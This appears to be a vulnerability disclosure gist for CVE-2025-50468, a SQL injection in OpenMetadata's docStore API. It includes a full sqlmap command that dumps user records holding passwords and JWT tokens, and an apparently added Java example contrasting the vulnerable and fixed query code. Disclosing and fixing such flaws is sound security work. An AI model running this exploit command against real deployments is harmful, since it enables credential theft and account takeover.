@javadk
Created August 8, 2025 05:06
CVE-2025-50468
[Suggested description]
OpenMetadata <=1.4.4 is vulnerable to SQL Injection. An attacker can
extract information from the database through the listCount function of
the DocStoreDAO interface, whose entityType parameter is used directly to
build a SQL query.
------------------------------------------
[Additional Information]
### Details
The open-metadata project exposes the function listCount of the DocStoreDAO interface at the API URL /api/v1/docStore. The entityType parameter is used directly to build a SQL query on lines 4411 and 4412, as can be seen in the following snippet:
![image](https://gist.github.com/user-attachments/assets/02506acb-3348-473f-8373-a1a896283b01)
### PoC
For instance, the table names in the openmetadata_db database can be extracted with the following request to reproduce this issue:
sqlmap can then be used to automate retrieving entries from the column "json" of the table user_entity in openmetadata_db:
```sh
sqlmap.py -u "http://localhost:8585/api/v1/docStore?entityType=*" --headers="Authorization: Bearer JWT TOKEN" --level=5 --risk=3 -D openmetadata_db -T user_entity -C json --dump
```
![image](https://gist.github.com/user-attachments/assets/4ef44f94-79aa-44fe-a667-97adf88c5358)
Passwords, JWT tokens, and other user data are contained in this table.
------------------------------------------
[Vulnerability Type]
SQL Injection
------------------------------------------
[Vendor of Product]
open-metadata
------------------------------------------
[Affected Product Code Base]
open-metadata <=1.4.4
------------------------------------------
[Attack Type]
Remote
------------------------------------------
[Impact Escalation of Privileges]
true
------------------------------------------
[Impact Information Disclosure]
true
------------------------------------------
[Attack Vectors]
### Summary
A SQL injection vulnerability exists in open-metadata 1.4.1 where an authenticated, low-privileged remote attacker could extract information from the database.
### Details
The open-metadata project exposes the function listCount of the DocStoreDAO interface at the API URL /api/v1/docStore. The entityType parameter is used directly to build a SQL query on lines 4411 and 4412.
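To make the root cause described in both Details sections concrete, the following is an added illustration of the difference between a JDBI DAO method that splices entityType into the query text and one that binds it as a parameter. It is not OpenMetadata's actual code: the table and column names, the use of JDBI's @Define, and the sample entity-type vocabulary are assumptions.

```java
import java.util.Set;
import org.jdbi.v3.sqlobject.customizer.Bind;
import org.jdbi.v3.sqlobject.customizer.Define;
import org.jdbi.v3.sqlobject.statement.SqlQuery;

// Illustrative reconstruction only; table/column names are assumptions.
public interface DocStoreDaoExample {

  // VULNERABLE PATTERN: @Define substitutes the raw string into the SQL text
  // before the statement reaches the driver, so whatever the caller sends in
  // entityType becomes part of the query structure itself (the WHERE clause
  // is under attacker control, which is exactly what the advisory reports).
  @SqlQuery("SELECT COUNT(*) FROM doc_store WHERE entityType = '<entityType>'")
  int listCountUnsafe(@Define("entityType") String entityType);

  // FIXED PATTERN: @Bind sends entityType as a prepared-statement parameter.
  // The database receives the query text and the value separately, so the
  // value is always compared as data and can never alter the statement.
  @SqlQuery("SELECT COUNT(*) FROM doc_store WHERE entityType = :entityType")
  int listCount(@Bind("entityType") String entityType);

  // Defence in depth at the resource layer: entityType is drawn from a fixed
  // vocabulary, so reject anything outside it before it reaches the DAO.
  // The values below are assumed sample entries, not the project's list.
  Set<String> KNOWN_ENTITY_TYPES = Set.of("table", "dashboard", "topic");

  static String requireKnownEntityType(String entityType) {
    if (entityType == null || !KNOWN_ENTITY_TYPES.contains(entityType)) {
      throw new IllegalArgumentException("unknown entityType: " + entityType);
    }
    return entityType;
  }
}
```

Reviewing a DAO for `@Define` (or string concatenation) applied to request-supplied values, rather than `@Bind`, is the quickest way to find further instances of this pattern.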
------------------------------------------
[Reference]
https://github.com/open-metadata/OpenMetadata/blob/4b9145a9da7ed95b7f868ab9f351e3d759af47d7/openmetadata-service/src/main/java/org/openmetadata/service/jdbi3/CollectionDAO.java#L4411
https://github.com/open-metadata/OpenMetadata/blob/4b9145a9da7ed95b7f868ab9f351e3d759af47d7/openmetadata-service/src/main/java/org/openmetadata/service/jdbi3/CollectionDAO.java#L4412